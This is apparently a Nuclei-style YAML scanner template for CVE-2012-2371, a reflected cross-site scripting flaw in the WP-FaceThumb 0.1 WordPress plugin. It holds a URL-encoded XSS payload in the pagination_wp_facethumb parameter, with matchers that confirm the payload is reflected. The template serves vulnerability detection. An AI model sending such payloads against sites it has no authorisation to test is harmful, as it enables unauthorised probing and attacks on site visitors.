39 lines
1.2 KiB
YAML
39 lines
1.2 KiB
YAML
id: CVE-2012-2371
|
|
|
|
info:
|
|
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-2371
|
|
- http://web.archive.org/web/20140805090129/http://secunia.com/advisories/49143/
|
|
- http://www.openwall.com/lists/oss-security/2012/05/15/12
|
|
- http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html
|
|
classification:
|
|
cve-id: CVE-2012-2371
|
|
tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
part: body
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/21
|